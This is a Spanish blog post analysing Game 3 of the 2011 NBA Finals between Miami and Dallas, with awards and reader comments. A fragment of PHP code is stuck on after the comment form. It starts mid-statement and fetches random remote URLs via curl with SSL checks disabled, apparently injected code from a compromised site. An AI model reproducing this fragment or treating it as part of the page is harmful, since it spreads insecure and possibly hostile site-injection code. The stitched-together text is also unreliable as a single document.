La Gran Final (05/05/2011): Más que dos puntos

06 de June de 2011 por TheDeerHunter

Golpe crítico para Dallas inmediatamente después de la machada que lograron el otro día. Hasta la fecha siempre que la final en este formato ha comenzado con un 1-1 el anillo ha ido a parar a manos de quien se lleva el tercer choque. Veremos si la estadística sigue cumpliéndose.

El punto se resolvió otra vez en un suspiro… Bueno, exáctamente en dos suspiros, uno ofensivo y otro defensivo. Con empate a 86 en el marcador y balón para Miami a falta de poco menos de un minuto, los Mavs parecen haber conseguido un trap doble primero a Wade y después a LeBron negándoles el bote a ambos. Con un gran pase extra James anula esta situación encontrando a Bosh abierto casi en la esquina. Bloqueado por Haslem, Nowitzi no llega a la defensa y Bosh acierta con tranquilidad a 39’6 segundos el lanzamiento más importante de su vida. El turno le llegaba al alemán para cerrar el partido. No fue muy original Carlisle: balón directamente a él y a resolver como en el anterior con todos sus compañeros abiertos, pero esta vez ante un Haslem que no es Bosh. No se puede decir que fuera una defensa inmensa, pero Nowitzki no estuvo tan inspirado como otras veces. Aguantando el primer reverso Dirk que se quedó sin bote demasiado pronto y el partido se le escapaba en un tiro forzadísimo.

Si la final termina llevándosela Miami diremos eso del predominio de las individualidades frente al conjunto, pero es que anoche Dallas sólo fue uno. Nowitzki hizo el doble que todos sus compañeros juntos en el último cuarto. Se puede decir que fue el único que anotó con eficacia de su equipo. Mientras, los Heat, además del Big Three y de otra exhibición de Wade, lograron una interesante producción tanto de Chalmers como de Haslem. Tampoco se pueden decir bondades de la defensa del equipo de Carlisle. Durante la primera parte, sobre todo, la zona fue literalmente un coladero donde Wade y LeBron penetraban como “Pedro por su casa”. Si se habla de “conjunto” en el partido de anoche hay que hablar de Miami y no de Dallas.

Al final partido feote que debería haber caido fácil del lado de Miami. Dirk Nowitzki es mucho Dirk Nowitzki y se cargó a su equipo para resolverlo al filo, como a él más le gusta. Pudo haber logrado ganarle la mano a Wade aún con su extraordinaria actuación, pero fue Bosh con una muy buena segunda parte y con ese tiro decisivo el que inclinó la balanza, resarciéndose de su pésima primera mitad y del partido del otro día.

Si los Mavs no ganan el próximo se acabó lo que se daba.

PREMIOS

MVP: Y ya van dos días en los que Dwyane Wade es el mejor de su equipo. Anoche fueron 29 puntos y 11 rebotes. En caso de ganar el anillo los Heat, la lucha por el MVP será encarnizada.

Sorpresa: Gran papel de Mario Chalmers saliendo desde el banco con 12 puntos, 4 rebotes y 2 asistencias. Y que Chris Bosh anote la canasta ganadora en un tiro de 6 metros tampoco es muy normal.

Decepción: Esta vez “Matrix” estuvo más apagado de lo que está siendo habitual en ataque (10 puntos). Resulto curioso lo esencial que se ha vuelto Shawn Marion para los Mavs.

Esfuerzo en vano: Dirk Nowitzki acabó con 34 puntos, 11 rebotes y 3 tapones y dio otra exhibición anotando tiros imposibles en el último cuarto. Desgraciadamente, el último no le entró y los Heat se llevaron el partido.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Txusma dice:
    #1

    Llega a fallar Chris Bosh ese tiro y posteriormente Dallas a llevarse el partido y ya nos podemos olvidar del ex de los Raptors. Lo hubiesen crucificado.
    Y sobre el debate del líder de los Heat. Un líder es algo más que hacer buenas actuaciones en los partidos. ¿Os habéis fijado quién es el que hace las charlas a sus compañeros antes de saltar a la cancha?

      Citar

  2. HisRoyalAirness dice:
    #2

    Txus está claro que un líder no es sólo eso pero lo que dices de las charlas no es así, siempre están poniendo la charla repetida del primer partido de Lebron, no es que hable él siempre, y además a él le encanta que se le vea como líder espiritual, también lo hace en los All-Star. En tiempos muertos y tras las presentaciones las hace Wade y, por poner un ejemplo, en los Lakers las hace Fischer (y todos sabemos quién es el líder).
    Yo veo a Wade como toda su vida en playoffs: sin miedo, dominando hasta el infinito y haciendo lo que tiene que hacer en todo momento, defendiendo como una hiena y siendo el mejor. A día de hoy es el MVP de los Heat de calle.

    Lo de la pintura de Dallas en la primera mitad es para matar a Chandler, deja entrar a cualquiera. Si le tienes que hacer una flagrante a alguien para acojonar, la haces.
    Pero sí, Dirk está muy solo. Debe estar pensando: “éstos se juntan 3 All-Star de 25 años y me ganan de 2 puntos, darme a mí sólo a uno y gano 3 campeonatos seguidos” (yo tengo sueños húmedos con Dirk+CP3)

      Citar

  3. HisRoyalAirness dice:
    #3

    Rectifíco, puede que las dé él pero eso no significa nada en mi opinión. Al principio del partido todos rodean a Dwayne puño en alto y ahí se corta el bacalao.

    Dicho esto, hay equipos en los que las charlas las da cada anormal…

      Citar

  4. Blade Petrovic dice:
    #4

    Esque cuando no es Lebron es Wade y cuando no Bosh

      Citar

  5. jas dice:
    #5

    a alguien mas le da la sensacion de q a terry le falta una hervida?? q intrankilidad me da verlo mas d 3 segundos saltando el balon (me recuerda un poco a TJ Ford). Anoxe dirk en el ultimo cuarto se cogio un buen cabreo tras un fallo de terry, no staba nada acertado y contagia nerviosismo a sus compañeros. A mi parecer barea le da mas mordiente y un ritmo mas coherente al ataque de los mavs y esta visto q se compenetra bastante bien con kidd, creo q a demostrado bastante ser un jugador mas q competente, por lo q no entiendo q no jueguen mas con la pareja kidd i barea.

    Si miramos l boxscore dl partido creo q hay una estadistica muy significativa d lo q fue el partido ayer, la pareja d interiores titulares d dallas tienen un +/- positivo tanto chandler como dirk, mas kidd y barea todos los demas balance negativo, estos 4 jugadores creo q son l alma d los mavs y son esenciales, de los demas puedes esperar alguna sorpresa d la jornada o un desastre como el q ayer hizo mahinmi (POR DIOS Q MALO ES)

      Citar

  6. GreenPride dice:
    #6

    Partido muy emocionante que creo que empieza a decidir la final para Miami.
    Durante la primera parte la defensa interior de los Mavs fue un coladero y Wade y LeBron entraron hasta la cocina como quisieron. Probablemente la falta de Haywood por lesión coartó a Chandler su defensa y parecía que Miami tenía el partido bien sujeto.
    Sin embargo Dallas este año es un equipo con carácter y además con un jugador en estado de gracia y con ánimo de no dejarse abatir fácilmente. En el último cuarto y tras un par de arreones anteriores de los Mavs bien respondidos por Miami, el alemán se hechó a la espalda a su equipo y con 12 puntos seguidos empató el partido. Por el otro lado Wade daba respuesta en un duelo que LeBron veía desde la barrera aceptando que esta vez era Dwayne el hombre caliente del equipo.
    Y he aquí que llegados estos minutos decisivos le dio por entrar en juego a Chris Bosh. Llevaba el ex-raptor dos partidos y pico más bien malos tirando a peores en ataque y había mostrado bastante falta de decisión pero en este final anotó varias de las canastas decisivas incluyendo un último tiro que ponía delante a su equipo. Luego Robin Hood, probablemente un poco cansado de tirar del carro perdió la bola pero LeBron no supo que hacer y volvió a Dirk con 4 segundos. Tiro fadeaway ante Haslem que no entra y victoria de Miami.
    La sensación es que Dirk está mucho más sólo de lo que están LeBron o Wade. Terry está realmente flojo sin encontrar posiciones ante la defensa de Miami (mérito de Wade principalmente) y sólo Barea, Kidd, Marion a veces y un fenomenal Tyson Chandler le acompañan pero ninguno de ellos tiene capacidad de decisión en los momentos definitivos en ataque.
    En definitiva, siempre con formato 2-3-2 y tras ir 1-1 el que ganó el tercero se llevó las finales y no creo que esta vez vaya a ser la de la excepción. Creo que Miami ganará uno de los 2 que quedan en Dallas y sentenciará en casa aunque espero que los Mavs ganen el 4º y pongan de nuevo algo de emoción en las finales

      Citar

  7. Denise dice:
    #7

    Las tres primeras canastas de los Heat que aparecen en el resumen son tres canastones…pero con Wade y Lebron haciendo pasos descaradamente. Que son unos jugones no hay discusión, pero la de puntos de menos que anotarían si les pitasen solo el 50% de los pasos que cometen.
    Y otra victoria más del que juega fuera de casa en estos playoffs (no solo en la final)….despúes la mayoría siguen creyendo en esa milonga llamada factor cancha, o ventaja de jugar en casa.

      Citar

  8. rmiller dice:
    #8

    Yo creo qe la cosas han cambiado, antes se hablaba de la individualidad de Miami, pero en este partido ha demostrado ser mas equipo qe Dallas.

    Estoy muy decepcionado con Terry, no es capaç de meter tribles importantes.

    Que un equipo tenga que usar a Marion como segunda arma ofensiva tal y como esta ahora es una verguenza y todo es culpa de Terry.

    Dirk se mereceria ser MVP, es una maquina, pero no es Jordan, ese tiro fue muy forzado y desde demasiado lejos, Haslem le hizo sufrir

      Citar

  9. Tobal dice:
    #9

    Una lástima esta derrota en casa,de los Mavericks,que les hace tener muy dificil esta final,en el primer tiempo estuvieron muy mal en defensa,dejando que entraran en la zona,donde Miami fue superior,eso sí el equipo volvió a acercarse en el marcador,pero los Heat siempre se mantuvieron por delante con mínimas ventajas.Dirk Nowitzki volvió a tirar del equipo,pero tuvo muy poca ayuda en ataque,y así es muy complicado ganar a un equipo como Miami,ahora a Dallas solo le vale ganar mañana,para tener alguna opción,porque si no,ya estaría imposible esta final,pero hay que ser optimistas,porque hoy se han quedado muy cerca.

      Citar

  10. TheDeerHunter dice:
    #10

    Joder… 18 años ya sin Petrovic
    mito

      Citar

  11. Javijaen dice:
    #11

    Partido raro pero desde el primer cuarto prácticamente siempre arriba Miami. Ya me direis el concepto equipo de los Mavs este partido: balones a Dirk. Sin embargo mucho mejor Heat en el colectivo, aunque sus tres estrellas cumplieron, en especial Wade. Esta vez no hubo remontada, pero veo la final mucho más reñida que a priori creía. Con respecto a los pasos que @Denise refería, a decir que los arbitrajes están siendo lamentables (para variar) para ambos bandos…

      Citar

  12. Blade Petrovic dice:
    #12

    Lo de Stevenson de llamar teatrero a James,Stevenson lleva un pique con James desde el 2008

      Citar

  13. TheDeerHunter dice:
    #13

    @Denise:

    53 victorias locales, 26 visitantes

    Nada más que el doble y tú hablas de milongas…

    No hay mayor ciego que el que no quiere ver.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>